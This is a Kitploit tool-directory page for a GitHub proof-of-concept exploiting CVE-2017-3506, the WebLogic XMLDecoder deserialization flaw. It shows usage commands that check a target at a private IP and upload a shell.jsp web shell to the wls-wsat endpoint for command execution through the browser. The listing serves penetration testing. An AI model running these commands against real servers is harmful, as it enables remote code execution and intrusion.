Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2017-3506 — CVE-2017-3506 | Kitploit
Tools/GitHubGitHub/al1ex/cve-2017-3506
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubal1ex/cve-2017-3506

CVE-2017-3506

CVE-2017-3506

View Repository
1015 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

What is this?

This is a poc of CVE-2017-3506(Weblogic XMLDecoder Serialization)

How to use it?

check vul
root@kitploit:~
java -jar WebLogic-XMLDecoder.jar -u http://192.168.174.144:7001

check

GetShell
root@kitploit:~
java -jar WebLogic-XMLDecoder.jar -s http://192.168.174.144:7001 /wls-wsat/CoordinatorPortType11 shell.jsp

GetShell

Then you can execute the command through the browser:

execut_command

Download Tool